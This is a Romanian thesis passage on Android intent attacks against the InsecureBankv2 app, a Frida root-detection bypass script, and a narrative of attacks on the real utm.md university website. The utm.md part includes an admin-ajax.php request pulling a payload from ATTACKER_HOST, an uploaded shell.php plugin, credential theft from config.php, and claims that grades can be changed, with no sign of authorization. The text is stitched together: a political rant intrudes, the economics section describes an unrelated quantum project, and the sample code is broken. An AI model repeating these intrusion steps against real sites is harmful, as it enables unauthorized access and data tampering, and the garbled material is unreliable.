Link: https://developer.android.com/guide/topics/manifest/manifest -intro?hl=ro

51
Există mai multe alte atribute pe care le pute m include într -un element Activitate pentru a defini
proprietăți, cum ar fi eticheta operației, pictograma de operare sau pielea pentru interfața de utilizator a
operației. Singurul atribut necesar este Android: nume – definește numele clasei de operare.
Elementul <activitate> poate seta, de asemenea, diferite filtre de intenție – folosind elementul
<intent -filter> – pentru a declara modul în care alte componente ale aplicației pot activa operația.
Când creați o aplicație, se declară o operație standard care are un filtru de intenție, care declară
Activitatea ca fiind una inițială. Această operație răspunde la executarea acțiunii „principale”. Un astfel
de filtru de intenție este următorul:
<activity android:name =”.ExampleActivity” android:icon=”@drawable/app_icon>
<intent-filter>
<action android:name =’’android.intent.action.MAIN” />
<category android:name =’’android.intent.category.LAUNCHER” />
<intent-filter>
</activity>

Elementul <action> indică faptul că acesta este punctul de intrare „principal” al aplicației.
Elementul <categorie> indică faptul că această operație ar trebui specificată în lansatorul de aplicații de
sistem (astfel încât utilizatorii s ă poată rula această operație).
Activ itățile care nu ar trebui să fie accesibile altor aplicații nu ar trebui să includă filtre de
intenție.
Dacă aveți nevoie de operație pentru a răspunde intențiilor implicite primite de la alte aplicații
(precum și de la cererea dvs.), pentru operațiune tre buie să fie definite filtre suplimentare de intenție.
Pentru fiecare tip de intenție la care doriți să răspundeți, trebuie să specificați un obiect <intent -filter>
care include un element <action> și un element opțional <categorie> sau <data> (sau ambele d intre
acestea). Aceste elemente determină tipul de intenție la care operațiunea dvs. poate răspunde.
Intentul este un obiect de mesagerie cu care puteți solicita executarea unei acțiuni de la o
componentă a altei aplicații. În ciuda faptului că obiectele I ntent simplifică schimbul de date între
componente în mai multe privințe, acestea sunt utilizate în principal în trei situații:
– de a porni o operație ;
– de a porni un serviciu ;
– pentru mesagerie prin broadcast .
Componenta Activitate este un singur ecran dintr -o aplicație. Pentru a porni o nouă instanță a
componentei Activitate, puteți utiliza intenția. Obiectul Intent descrie operația pe care doriți să o
începeți și conține, de asemenea, toate celelalte date necesare

52
Serviciul este o componentă care efectuează acțiuni în fundal fără o interfață de utilizator. Un
serviciu poate fi pornit pentru a efectua o singură acțiune (de exemplu, pentru a descărca un fișier)
trecând un obiectIInt. Obiectul Intent descrie serviciul pe care doriți să îl porniți și conține, de
asemenea, toate celelalte date necesare.
Un mesaj de difuzare este un mesaj pe care orice aplicație îl poate primi. Sistemul oferă diverse
mesaje de difuzare despre evenimentele sistemului, de exemplu, atunci când sistemul pornește sau
dispozit ivul începe să se încarce.
4.2 Tipurile de obiecte
Obiectele Explicit Intent indică componenta rulată după nume (clasă complet calificată).
Exemplu de cod pentru apelarea unui obiect Intent:
Intent downloadIntent = new Intent( this, DownloadService.class);
downloadIntent.setData(Uri.parse( fileUrl));
startService(downloadIntent);
Obiectele Implicit Intent nu conțin numele unei componente specifice. Exemplu de cod
pentru apelarea unui obiect Inte nt.
Intent sendIntent = new Intent ( );
sendIntent.setAction(In tent.ACTION_SEND);
sendIntent.putExtra(Intent.EXTRA_TEXT, textMessege);
startActivity(sendIntent);
Obiectele Explicit Intent sunt utilizate de obicei pentru a porni o componentă din propria
aplicație, deoarece știți numele clasei operației sau serviciului pe care doriți să îl porniți. De exemplu,
puteți începe o nouă operație ca răspuns la o acțiune a utilizatorului sau să porniți un serviciu pentru a
descărca un fișier în fundal.
De fapt, acest obiect Intent rulează în mod explicit clasa DownloadService di n aplicație.
Intențiile implicite declară, în general, acțiunea efectuată, ceea ce permite unei componente
dintr -o altă cerere să proceseze această solicitare. De exemplu, dacă doriți să arătați utilizatorului un loc
pe hartă, atunci utilizând obiectul Int enție implicit, puteți solicita ca o altă aplicație să o facă în care este
oferită această posibilitate.
De asemenea, pentru un obiect implicit, puteți descrie un handler de condiții dacă nicio aplicație
nu poate trata acțiunea specificată.
Cum Android lucreaza cu obiectele Intent
În doua cazuri din toate poate fi exploatate datele:
– cînd este creat un obiect nou ;
– cînd este creat un obiect implicit a Intentului .

53
Când se creează o intenție explicită pentru a începe o operație sau un serviciu, sistemul pornește imediat
componenta de aplicație specificată în Intent.
Când este creat un Intent implicit, Android găsește o componentă adecvată prin compararea
conținutului Intentului cu filtrele Intent declarate în fișierele manifeste ale altor aplicații de pe
dispozitiv. Dacă obiectul Intent se potrivește cu filtrul Intent, sistemul pornește această componentă și îi
trece obiectul Intent.
Dacă sunt adecvate mai multe filtre Intent, sistemul afișează o casetă de dialog în care
utilizatorul poate selecta o aplic ație pentru a efectua această acțiune.
Un filtru Intent este o expresie dintr -un fișier manifest de aplicație care indică tipurile de obiecte
Intent pe care le poate accepta o componentă. De exemplu, prin declararea unui filtru Intent pentru o
operație, da ți altor aplicații posibilitatea de a începe direct operațiunea utilizând un obiect Intent. În mod
similar, dacă nu declarați niciun filtru Intent pentru o operațiune, atunci acesta poate fi pornit doar
folosind un obiect Intent explicit.
Dacă creem o inte nție explicită pentru o activitate care nu poate fi exportată, returnarea va
reveni: java.lang.SecurityException: Refuzul permisului: începerea intenției {flg = 0x10000000 cmp =
com.android.insecurebankv2 / .DoLogin} de la null (pid = 11833, uid = 2000) ne exportat din uid 10084

Figura 4.3 – Atack real pe aplicațiile android
Atacul activitaților expuse
Aplicația utilizată aici este o aplicație pentru mobile banking
Activitatea:
<activity
Android:label=”@ref/0x7f07005d”
Android:name=’’com.android.insecurebankv2.ViewStatment”
Android:esported=”true”/>
Intentul Explicit
Cod statement in termux vezi figura mai jos

54
Figura 4.3 – Atack real pe aplicațiile android cu ajutorul dozer
Ca urmare are loc
-Aplicația permite utilizatorilor să trimită bani elec tronic altor utilizatori PayPal ;
-Pornind o componentă numită SendMo neyActivity în aplicația PayPal ;
-Declară un filtru de intenție și, prin urmare , este exportat în mod implicit .
Ca urmare are loc introducerea datelor si afisarea unor date in terminal
4.3 Intent Snifing Atack
Ca urmare are loc introducerea datelor si afisarea unor date in terminal prin linia de consola de la
tastatură acest fapt permite liberul acces la toate procesele legate de acestă aplicație și chiar de procesele
interne a intregului android acest lucru poate fi vazut mai jos în figura 4.10 – Atacuri asupra intenturilor
folosind sniffing .

Figura 4.10 – Exemplu de sniffing pe aplicatia de banking
În mod real fiecare aplicație care este la moment pe piață este compusa din o multime de
componente, fiecare component avînd rolul său și funcționalul său, care nu depinde de alt funțional doar
de mașina pe ca re lucrază si de compilatorul care rulează sau interpreteazaă componenta data cu
propriul funcțional. Să nu uiăm ca în prezent sunto multime de tehnologii care ne permit să creem
propriile componente pe lînga cele native care sunt deja infiltrate în compi lator sau interpretator.
Anume că aceste tehnologii noi ne permit exploatarea, infiltrarea, bombardarea, utilizarea,
exfiltrarea, transmiterea și multe altele a datelor de pe hosturile reale din lumea prezenta și să nu uităm
că hosturile nu sunt doar calcu latoarele si leptorurile dar și telefoanele mobile ,IoT device cu ajutorul
cărora este posibil de obtinut sau de distrus orice date din lumea virtuală sau mediul online, mai bine
spus tehnologiile noi ne permit si ne largesc spectrul de psibilități care n u pot fi controlate de stat.
Și la ora actuala însăși definiția de stat sa învechit și nu mai este actuală, acesta fiind ceva
demodat care stagnează dezvoltarea societății in multitudinea de domenii, mai ales în IT și securitatea
informațională de aici rei ese că statul trebuie eliminat și de creat ceva nou și flexibil ca internetul!.
Ca urmare a introducerii parolei si login automat este posibil de extras aceste date figura 4.11

55

Figura 4.12 – Exemplu de sniffing pe aplicatia de banking și outputul la sniffing
Atack prin injectare
Implementarea broadcast
Intent injectat în broadcast receiver și Broad cast receiver implementarea lui
<receiver
Android:name=’’com.android.insecurebankv2.ViewStatment”
Android:ex ported=”true”>
<intent-filter>
<action
Android:name=”theBroadcast”/>
</intent -filter>
</receiver>
Reprezentarea unui intent prin cod are lor cu ajutorul clasei BrodcastReceiver vezi figura 4.13

Figura 4.13 – reprezentarea unui intent prin intermediul java cod

56
Ca urmare are loc un proces de evidențiere a datelor cu 3 cîmpuri :
-Mesajele trimise cu insucces ;
-Mesajele primite cu succes;
-Mesajele trimise cu succes .
Acest lucru este necesar pentru a obtine credentialele care sunt trimise prin mesaj de către bancă
care pot fi ușor extrase prin injection a frame -lor deja dupa se afiseaza un cod vezi figura 4.14 de mai
jos.

Figura 4.14 – Internal output a cîmpului Vi ewStatement
În imaginea de mai jos sunt introduși cîțiva parametri cu o singura comanda de a insera un cod si
de a schimba parola, schimbarea parolei poate deja fi vazută în mesajele din segvența din stînga.
Parametrii introdusi sunt :
– parametrul -> a Joacă rolul d e a trimite un mesaj tuturor ;
– parametrul -> e Are rolul de imput la mesaj sau la orice text care trebuie de trimis ;
– restul parametrilor sunt cu rolul de identifier și changer a unor date .
Acestasta este demonstarat in toate figurile incluse în subcapitolele activități și intenturi mai ales in
figura de mai jos figura 4.15

Figura 4.15 – Internal input prin broadcast pentru a schimba parola.

57
Un alt tip de vulnerabilitate cu scopul obținerii datelor este cum este o aplicație care
funcționează sub controlul Frida (u n instrument binecunoscut care permite să fie preluat controlul unei
aplicații și să implementați codul). Aici vor fi citate cinci tehnici binecuno scute și trei proprii: D etectare
Frida pentru Android .
– căutarea bibliotecilor frida – agent și frida – gadget într -un fișier. Eșecul se poate întâmpla dacă
cracker -ul își schimbă numele în bibl iotecă. / proc / <pid> / maps;
– căutarea în memoria bibliotecilor native de linii s peciale (așa cum se spune în). Un cracker
poate re -vedea Frida cu linii schimbate ;
– parcurgere toate porturile TCP deschise acolo, transmitere un mesaj dbus -AUTH și aștepta re
un răspuns de la Frida. Metoda funcționează bine atunci când se ut ilizează un se rver frida (pe un
dispozitiv înrădăcinat), dar este inutilă dacă aplicația a fost reambalată cu gadgetul frida inclus (de
obicei funcționează, când este imposibil să o bțină rădăcină pe dispozitiv);
– Verificare la disponibilitatea unui anumit număr de fiș iere Frida în director. Din nou, un
cracker poate redenumi aces te fișiere. / data / local / tm;
– Verificarea dacă secțiunile executabile ale bibliotecilor native sunt deschise pentru înregistrare.
Într-o situație normală, ace st lucru este aproape imposib il;
– Căutarea fluxurilor gadget – frida – server și frida – gadget pe care Frida le rulează în cadrul
aplicației experimentale;
– Căutarea la unități numite specifice Frida în catalog. / proc / <pid> / fd ;
– Compararea codului bibliotecilor native de pe disc și din memorie. La implementare, Frida
modifică secțiunea text a bibliotecilor native. Exemple de utilizare a ultimelor trei tehnologii sun t
publicate în github Detectarea rădăcinii cu Frida la mine pe gi thub Cu privire la modul de dezactivare a
verificării drepturilor de rădăcină în configurarea experimentală folosind Frida sau un set de instrumente
bazat pe Frida. Bypass pentru detectarea rădăcinilor Android folosind scripturi Obiecție și Scripturi
Frida În cele mai multe cazur i, va fi suficient să descărcarce un scri pt gata pregătit sau să folosească
instrumentul Obiecție pentru a dezactiva verificarea pentru rădăcină: Poziția Frida rădăcină android
dezactivată Totuși, este posibil ca aceste metode să n u fun cționeze și atunci trebuie să fie scris propriul
script. Pentru a face acest lucru, trebuie să fie descompus puntea pentru a testa aplicația experimentală și
să fie găsit funcția în ea care este responsabilă pentru verificarea prezenței drepturilor de rădăcină pe
dispozitiv. De obicei, dar arată așa:
private static boolean detectmeth () {
String[] arrayOfStr = new String[10];
arrayOfStr [0] = "/system/app/Superuser.apk";
arrayOfStr [1] = "/sbin/su";
arrayOfStr [2] = "/system/bin/su";
arrayOfStr [3] = "/system/xbin/su";
arrayOfStr [4] = "/data/local/xbin/su";

58
arrayOfStr [5] = "/data/local/bin/su";
arrayOfStr [6] = "/system/sd/xbin/su";
arrayOfStr [7] = "/system/bin/failsafe/su";
arrayOfStr [8] = "/data/local/su";
arrayOfStr [9] = "/su/bin/su";
int a = arrayOfStr.length;
int b = 0; while (a < b) {
if (new File(arrayOfString[a]).exists()) { return true; } a +
= 1; } return false; }
De exemplu, se află în interiorul clasei roottest într-un pachet Java com.test.test . Tot ce trebuie
să fie facut este să fie înlocuit această funcție cu un dop care întoarce întotdeauna fals. Următorul script
este necesar pentru acest lucru:
Java.perform(function () {
var MainActivity = Java.use('com.test.test.roottest');
MainActivity.root.implementation = function (detectmethods) {
console.lo g('Done: bypassed'); return false; }; }
Și mai departe este rulat scriptul de sub conducerea softului frida:
$ frida ‐l rootbypass.js ‐f numele pachetului aplicației
Astefel poate fi instalat și explatat orice date de pe android cu versiunea OS minim 11.
În general datele pot fi preluate din orice colț al lumii si pot fi prelucrate în orice colț al lumii din
motive diferite, de acest lucru nu este protejat nimeni indiferent cît de securizat nu ar fi sistemul, astfel
imaginea de mai jos reprezint un arbore care redă sursele de extragere a datelor pentru a fi exploatați în
continuare de orice companie de mass -media în fig ura 4.16

Figura 4 .16 – Multitudinea de resurse prin care se poate de extras date despre utilizatori sau companii

59
Contracararea vulnerabilităților se poate de făcut prin mai multe metode principala dintre ele este
efectuarea updatelor de versiune, î nsă nu este posibil de făcut update la mintea omenească și să o pui în
functiune normal ca sa dispară lenea complect, astfel în cit sa fie făcut lucrul la 100% .
Toate configurarile la servere sa fie făcute la maxim astfel în cît nici o constantă sa nu poată fi
exportată , să nu fie redată versiunea la webserverul sau la sistema de operare care stă pe host.Una din
problemele identificate in exemplele de mai sus este vulnerabilitatea export la key privată a
certificatului TLS/SSL, Acest lucru permite libe rul acces la tot traficul, pentru a evita acest lucru ar fi
bine de procurat certificate mult mai bune ude cheia de încriptare este minim 1024bit în caz ca este mai
mică este usor de spart certificatul prin bruteforce acesta fiind în figura 4.17 .

Figura 4.17 – Top parolelor utilizate care aduc cele mai mari pagube , inclusiv folosit în brute

4.4 Analiza, indetificarea vulnerabilităților sistemului universitar al
universității
Cum a fost menționat anterior toate sistemele web care au conexiune cu lumea externă sunt
vulnerabile la atacuri cibernetice din diferite motive la fel si site Universității Tehnice : https//utm.md
este vulnerabil la marea majoritate de atacuri cibernetic e, începînd de la atacuri pe partea de client pînă
la partea de webserver(PHP version 5.5.4). În toate experimentele realizate pe baza domenului utm.md a
fost demonstarat că univesitatea nu are nici o grija de de datele studenților pe care îi încadrează iî n
sistemul universitar timp de cei 4 ani, de aici se pate de spus ca orice date cu caracter personal pot fi
extrase dar și mai rău, ele pot fi modificate astfel reiese ca notele introduse în baza de date a studenților
pot fi modificate ceia ce înseamnă ca orice student de nivel mediu poate obține note de excelente la
finele anului 4 dupa examenul de licența prin o comandă sql(mysql) , unica ce este super în configurarea
serverului sql este ip -blocking din diferite țari are lumii. Însă de pe Ip universității este posibil de
conectat la mysql și prin brudforce sau exploituri de conectat și de executat modificările necesare mai
ales , dacă este cunoscut username la server. În continuare vor fi reprezentate și explicate intrările și
ieșirile efectuate asupra dome nului utm.md.Ca urmare al primului scan a fost afisat api universității care
permitea de comunicate direct cu site și mai apoi exploatarea lui, api fiind \/\/utm.md \/wp-
content \/v1\/2019 \/07\/conf.json, la rîndul său a fost afisat un outpul de format json care afișa că este

60
posibul de explatat cmd prin api ( unicul lucru în lucrarea nu sunt toate etapele atacurilor incluse din
motivuri de securitate personală a autorului lucrării) :
{"code":0,"posts":[{"ID":59042,"title":"student's
guide","type":"pdf","ready_function":"","data":{"post_ID":"59043","guid":"https: \/\/utm.md\/w
p-content\/uploads \/2019\/07\/UTM_Booklet_EN_2019 -07-
01.pdf","pdf_pages":"44","pages_customization":"none"},"thumbnail":{"data":{"post_ID":"0"},"t
ype":"auto"},"pro ps":{"height":"auto","width":"auto","gravity":"auto","cachedPages":"auto","r
enderInactivePages":"auto","renderInactivePagesOnMobile":"auto","renderWhileFlipping":"auto",
"pagesForPredicting":"auto","preloadPages":"auto","rtl":"auto","sheet":{"startVelocity" :"auto
","cornerDeviation":"auto","flexibility":"auto","flexibleCorner":"auto","bending":"auto","wav
e":"auto","widthTexels":"auto","heightTexels":"auto","color":"auto"},"cover":{"startVelocity"
:"auto","flexibility":"auto","flexibleCorner":"auto","bending":" auto","wave":"auto","widthTex
els":"auto","heightTexels":"auto","color":"auto","binderTexture":"auto","depth":"auto","paddi
ng":"auto","mass":"auto"},"page":{"startVelocity":"auto","flexibility":"auto","flexibleCorner
":"auto","bending":"auto","wave":"auto"," widthTexels":"auto","heightTexels":"auto","color":"a
uto","depth":"auto","mass":"auto"}}," controlProps":{"actions":{"cmdSave":{"enabled":"au
to"},"cmdPrint":{"enabled":"auto"},"cmdSinglePage":{"enabled":"auto","active":"auto
"}}}}]}
Urmarea acestui output a f ost scanarea prin wpscan și obținerea numelui de administrator și a
tuturor utilizatorilor inregistrați care fiind un mare plus în comunicare prin api și cercetarile în
continuare pîna la urmatoare injectare de cod pentru obținere acces la serverul apache .
O altă vulnerabilitate deja cea mai utilizată la moment este exploatarea fișierului admin –
ajax.php prin semnult intebării ?cmd= sau alte attribute de genul from&to s.a.m.d, prin vulnerabilitatea
data a fost posibil de importat un file de pe un host anumi t, la momentul dat a fost o imagine în care a
fost injectat un cod php (phpinfo(); ) cu ajutorul lui exiftool, acest lucru a fost facut din motivul ca
serverul nu permitea de incărcat fișiere de tip script sau fișiere executabil post requestul fiind de
formatul https://utm.md/wp -admin/admin -ajax.php ?swp_debug= load_options &swp_url=
http://ATTACKER_HOST/payload.txt însăși codul fiind phpinfo() din imaginea și la fel a fost posibil
de creat un shell code pentru a exploata sistemul.
La fel a fost gasit fingerprint pentru autentificare pe site prin intermediul unor ustensile specifice
pentru fingerprint, id la fingerpr int a fost b4efb3e7744d0a1e70748138da9e6804
La fel a fost posibil de injectat direct un plugin prin intermediul fișierului update.php, acesta a
fost posibil din motivu l misconfiguration a serverului, si la fel a versiuniii de php si a cms wordpress
versiun ea fiind 4.9.8. Ca urmare a injectării de plugin, acesta viand un fișier shell.php similar dupa
formă cu un adevărat plugin ceia ce permitea la fel de utilizat la maxim vulnerabilitatea dată și de
obținut complect acces la site prin utilizarea datelor din fișirul config.php unde era indicat datele de la

61
baza de date username si password requestul cu parametrul are forma de tipul wp-admin/update.php?
action=upload -plugin

62
5 Evaluarea Economică A Cercetării

Acest proiect din punct de vedere economic este catalogat drept cercetare științifică. Dat fiind
faptul că proiectul este destinat comunității cercetătorilor, nu este preconizat de a fi scos pe piață drept
produs comercial pentru utilizatori. Potențialii b eneficiar ar fi cei mai simpli utilizatori ale sistemele
infomaționale dar și cei mai advansați utilizatori ca SRE inginerii. Dat fiind caracterul inovativ al
experimentelor efectuate, la faza inițială este posibilă stagnarea sau lipsa de profit, odată cu scoaterea
produsului spre mediul de dezvoltare larg. Resursele utilizate în cadrul acestui proiect sunt considerate
de a fi scumpe în achiziții în masă. Dat fiind necesitatea de putere de calcul sporită în executarea
experimentală a testelor. Majoritatea a lgoritmilor deja creați de către companiile de pe piață sunt
distribuiți dezvoltatorilor fără taxă sau vreo limitare cu opțiunea de achiziție ulterioară. Costurile apar
atunci când este apelată la distanță un serviciu cu ajutorul simulatorului. Spre exempl u, Microsoft oferă
abonamente pentru rețeaua lor Azure. Dacă proiectele sunt de dimensiuni mari, atunci costurile pot
crește semnificativ.
În continuare este prezentată analiza detaliată din punct de vedere economic a proiectului. Dacă pe
viitor tehnologi ile vor permite de a comercializa astfel de proiecte, vor avea un avantaj semnificativ pe
piață datorită caracterului inovator și securității sporite. Investițiile inițiale pentru dezvoltare au fost
destul de reduse, la faptul că experimentele și simulatoa rele au rulat totul în regim local de distribuție.
Experimentul nu a fost extins către mai multe calculatoare sau către un serviciu online. Totuși se
recomandă de a realiza unele teste și cercetări chiar dacă calificarea specialiștilor în domeniu este dest ul
de înaltă. Astfel în cadrul calculului cheltuielilor se pot conține și taxa pentru cursuri de instruire sau
bazată pe timp, dacă simulatorul sau programul este necesar să ruleze pe o durată mare de timp. Aici se
pot include și cheltuielile pentru salari ați. Dacă este necesar vor fi incluse de asemenea orele de muncă
peste program sau în zilele de odihnă. Dacă însă procesul este eficient automatizat, atunci poate fi
exclusă intervenția umană și rezultatele fiind prelucrate automat de către algoritmii sist emului. La scară
mare aplicat, proiectul dat se consideră costisitor. Dat fiind faptul că include componente din 2 ramuri.
Una este tehnologii informaționale, cealaltă inginerie matematică. Pentru construirea mașinii fizice, este
necesar utilaj destul de a vansat care nu orice companie își poate permite să investească. Astfel, multe
din teste se bazează pe mediul online, unde este necesar și suficient un singur calculator. Rata de
exactitate a rezultatelor mașinii fizice este pusă sub îndoială, astfel din pu nct de vedere a rentabilității
economice, poate fi destul de mare pierderea. Dacă nu funcționează corect sau sunt deficiențe, sume
mari de bani riscă să fie pierdute în zadar. De aceea investitorii mari au grijă înainte de a finanța
proiecte de tipul dat, analizând fiecare detaliu despre sistem și potențiale riscuri. Riscuri întotdeauna vor
exista, așa că companiile mici, preferă să nu investească în domeniul inovativ ce reprezintă o ramură a

63
necunoscutului. La moment în scopuri pur experimentale, compania Microsoft investește în dezvoltarea
algoritmilor și sistemelor cuantice.
Descrierea Experimentului Executat
Această cercetare științifică conține mai multe resurse de tip open -source ce sunt disponibile
deschis fără taxă în mediul online. Formulele matematice, metodele, bibliotecile utilizate au fost
majoritatea predefinite, astfel resurse substanțiale economice nu au fost utilizate. Proiectul a fost necesar
de a fi executat pe un calculator cu suficientă memorie operativă și resurse de procesare. Da t fiind faptul
că conversia din biți clasici în biți cuantici este destul de consumatoare de resurse, pentru executarea
proiectului la scară largă, costurile economice cresc considerabil. Fie că este utilizat un simulator de la
distanță cu abonament lunar, fie că este procurat o stație de lucru industrială, toate acestea necesită
cheltuieli de a fi prevăzute. Majoritatea ideilor generate pe urma testării metodelor în simulator sunt
nemateriale. Astfel pot fi ulterior dezvoltate prin continuarea acestui proi ect sau prin pornirea spre
executare a unuia nou creat. Executarea simulatorului poate fi executată de asemenea pe mai multe
dispozitive de la distanță. Astfel dacă proiectul se dovedește a fi de succes, extinderea ar genera costuri
suplimentare substanția l de mari. Totuși rezultatele nu întotdeauna pot fi exacte sau verificate, astfel
există riscuri destul de mari ca investiția să se piardă în zadar. Având șanse să fie pierdute resurse
bănești considerabile. Totul depinde de cererea pe piață a proiectului. Dat fiind caracterul inovator și
metoda fiind relativ nouă pusă la dispoziție pe piață, cererea poate fi considerabil de mică. Astfel în
multe dintre cazuri, proiectele de experimentare nu sunt scoase pe piață, doar fiind distribuite contra
cost a unui gr up de cercetători la solicitare. De asemenea la solicitare, pot avea loc schimbări în cadrul
testului și perspective de a obține rezultate mai exacte sau în dependență de necesitate, chiar noi
algoritmi pentru dezvoltarea matematicii teoretice cu ajutorul calculatorului. Simulatorul și proiectul dat
este prima interfață în cazul unui calculator cuantic. Metodele sunt perfect compatibile, iar exactitatea
simulatorului este mare, deci proiectul poate fi considerat destul de universal în cadrul potențial de
aplicare. Simulatorii de fenomene, calcule sau conectări cu calculatorul la servere sunt diverși.
Majoritatea fiind de tip open -source, astfel cheltuieli suplimentare pe această ramură nu sunt prezente.
Analiza Swot
În scopul identificării raționamentului proiectului este efectuată analiza mediului intern și extern
al proiectului. Pentru aceasta adesea se execută metoda generală de analiză numită și analiza SWOT .
Aceasta constă în evaluarea (enumerarea) punctelor forte și slabe ale mediului intern cât și mediului
extern în cadrul proiectului. Proiectul include atât perspective de dezvoltare pe viitor cât și neajunsuri
din punct de vedere tehnologic. Majoritatea problemelor apar atunci când pe piață nu este prezent
utilajul necesar pentru a dezvolta corect experimental sistemul dat. Deficiențele de ordin tehnic sunt

64
prezentate detaliat în cele ce urmează. Dat fiind faptul că legislația actuală nu specifică clar lucrul cu
astfel de proiecte, se consideră că nu reprezintă o deficiență. Unul din principalele av antaje descrise în
matricea swot este lipsa concurenților pe piață. Dat fiind faptul că aceste proiecte sunt foarte rar
dezvoltate de companii mari și nu ajung pe piață, nu există riscul de saturație sau concurență. Caracterul
inovativ al proiectului îl fa ce să fie actual pe termen lung și posibilitatea de a fi dezvoltat, practic nu este
limitată. Este considerat de a avea un potențial crescut față de alte sisteme realizate în prezent. Toate
acestea vin și cu un șir de dezavantaje, cum ar fi calificarea per sonalului. Fiind necesar deseori instruire,
cheltuielile sunt destul de ridicate. De asemenea este necesar de a fi întocmit planul ce va reprezenta
cursurile de specialitate frecventate. Certificarea fiind obligatorie.
Conform Tabelului 1, sunt prezentate punctele forte, punctele slabe și perspectivele proiectului.
Tabelul 1 – Matricea Swot
Mediul Intern
Puncte Forte
1. Caracterul inovativ al metodei.
2. Posibilitatea extinderii testelor pe diferite
dispozitive.
3. Fuzionarea și testarea matematicii teoretice
cu ajutorul tehnologiilor computaționale.
4. Perspectiva de trecere cu ușurință la
calculatoare moderne , tendință de viitor.
5. Calculele paralel rapide, rezolvări rapide
de probleme exotice a matematicii
teoretice . Puncte Slabe
1. Pregătirea slabă a ang ajaților și
cercetătorilor în domeniu.
2. Testările includ resurse costisitoare.
3. Complexitatea sporită a algoritmilor
cuantici.
4. Lipsa de acreditări din parte organizațiilor
specializate în cercetarea securității .
5. Lipsa de fonduri, datorită faptului că
testele au riscuri de a eșua.
Mediul Extern
Oportunități
1. Lipsa concurenților.
2. Caracterul inovativ al proiectului.
3. Șansă de dezvoltare pe termen lung cu
potențial de a fi realizate la scară largă.
4. Inovarea permanentă a tehnologiei la nivel
global. Riscuri (pericole)
1. Legislație defectuoasă și lipsa
transparenței.
2. Lipsa cererii.
3. Lipsa fondurilor de finanțare.
4. Lipsa tehnologiilor suficient de avansate
pe domeniu.
În cadrul analizei au fost incluși toți factorii principali ce pot contribui la dezvoltare și riscurile
proiectului.

65
Planul Calendaristic a Cercetării
Bugetul de timp necesar proiectului a fost stabilit în zile calendaristice. Instrumentele utilizate
majoritatea sunt programe de tip soft în ce rulează pe sistemul de operare Windows 10. Instrumentele de
proiectare majoritatea sunt contra cost. Astfel dacă proiectul este desfășurat pe ansamblu, cheltuielile
pot crește. Licențele adesea comercializându -se pe dispozitiv. La cerere se pot utiliza și licențe de tip
gratuit în scopul educaționa l. Dacă proiectul se preconizează de a fi inclus în programa de studiu pentru
tinerii cercetători și inginerii ce tind să obțină certificare de specialitate.
Tabelul 2 include detaliat zilele în care au fost efectuate lucrări asupra experimentului și testă ri
în simulator. Planul calendaristic este destul de lungă durată în timp considerat. În cadrul unui proiect
amplu se poate extinde și până la ani de zile. Este important să fie calculată corect remunerarea
personalului ce este implicat în proiect. Dacă es te necesar, să fie incluse și zilele de odihnă care se vor
achita dublu în caz de urgentare a executării proiectului tehnologic.
Tabelul 2 – Fondul de Timp Necesar Elaborării Proiectului
Nr.
d/o Denumirea Acțiunii
Perioada Durata
Acțiunii / Zile Executant Resurse
Utilizate Începerea Finisarea
1 Proiectarea
bibliotecilor
necesare la simulare 15.09.18 30.09.18 15 Specialistul IT
matematician SRE
2 Proiectarea porților
logice de securitate 01.10.18 20.10.18 20 Specialistul IT
matematician AllFusion
Process
Modeler
3 Testarea
operațiunilor în
simulator 03.11.18 23.11.18 20 Specialistul IT
matematician Visual
Studio
4 Analiza grafică și
procesarea
rezultatelor 04.01.19
24.01.19 20 Specialistul IT
matematician Numerical
QKD
5 Întocmirea
Documentației,
Verificarea
Calculelor, 15.02.19 15.03.19 30 Specialistul IT
matematician Wolfram
Alpha,
Calculator
x86
Fondul de timp necesar a fost calculat cu rezerve de timp, astfel lucrările efectuate aveau la
dispoziție câteva zile adăugător rezervă. Nefiind luate în considerare zilele de odihnă. Complexitatea
experimentului legat de proiect fiind destul de mare, a fo st necesar de testat toate instrucțiunile și
modelele posibile înainte de a fi incluse în proiectarea finală arhitecturală. Astfel timp a fost necesar
ceva mai mult pentru lucrul paralel atât cu proiectarea cât și cu rularea în simulator. Bazele teoretice și
demonstrația matematică a fost pusă la punct inițial, înainte de a începe propriu zis experimentul.
Analiza și calculele au arătat că este posibil de executat în simulator precum în mediul real a
experimentelor și testelor. Rentabilitatea fiind destul d e bună, pentru cercetarea științifică. Ne fiind
comparată cu aplicația comercială sau cu piața de larg consum. Dacă acest proiect este transmis unui
grup de angajați pe domeniu și continuă dezvoltarea acestuia, recomandarea este de a lua în calcul
bugetul de timp în zile. Adesea, aceste experimente pot fi de multe ori rulate sau rularea lor necesită

66
timp îndelungat, de aceea este de asemenea important de a stabili intervalele de timp cu o rezervă de o
zi sau două. Lucrul peste program sau potențialele eșecu ri de asemenea trebuie luate în considerare.
Orele suplimentare fiind achitate dublu față de cele de orarul de muncă, dacă executarea testelor se
efectuează noaptea conform unui grafic stabilit.
Calculul Indicatorilor Economici
Activele utilizate la dezvoltarea proiectului au fost împărțite în două categorii de bază. Acestea
fiind materiale și nemateriale. Printre cele materiale se numără calculatoare, memorie, componente
hardware potențial necesare. De asemenea au fost utilizate și programe soft inst rumentare care se
bazează pe licențe. În Conform prezentării din Tabelul 3 sunt prezentate activele utilizate în cadrul
proiectului și cercetării.
Tabelul 3 – Imobilizări Corporale
Nr.
d/o Denumirea/tipul
activului Un.de
măs. Preț achiziție pe
unitate,
MDL Cantitatea Valoarea
de intrare,
MDL
1 Calculator cu Sistem de
Operare Windows Unit. 20000 1 20000
2 Visual Studio Pro Lic. 7500 1 7500
3 RAM GB 6500 1 6500
4 Total 34000 3 34000
De asemenea au fost necesare un set de consumabile pentru calculul manual matematic și
demonstrarea unor teoreme. Majoritatea resurselor utilizate sunt din mediul electronic, astfel ca suport a
fost necesar un manual teoretic de matematică . Conform Tabelul ui 4 sunt catalogate resursele
consumate drept materiale.
Tabelul 4 – Consumuri directe de materiale
Denumirea Un. De
Măs. Preț pe unitate,
MDL Cantitatea Valoarea totală,
MDL
Foi format A4 Unit. 1 10 10
Pix cu gel Unit. 5 2 10
Manual de matematică Unit. 120 1 120
Enterprise Arhitect Lic. 1000 1 1000
Simulator Cloud Lic 300 1 300
Total 1426 15 1440
Dacă perspectiva este de extindere a proiectului, costurile pentru resurse chiar și fiind ele
consumabile, va crește eventual. Demonstrația matematică se recomandă de fiecare dată să fie efectuată

67
manual, după care trecerea are loc în simulator, eventual s copul final fiind testarea rezultatelor. Aici pot
fi incluse și unele materiale pentru crearea de machete sau planuri fizice, dar la această etapă nu a fost
necesar utilizarea lor.
Cheltuieli Privind Retribuirea Muncii
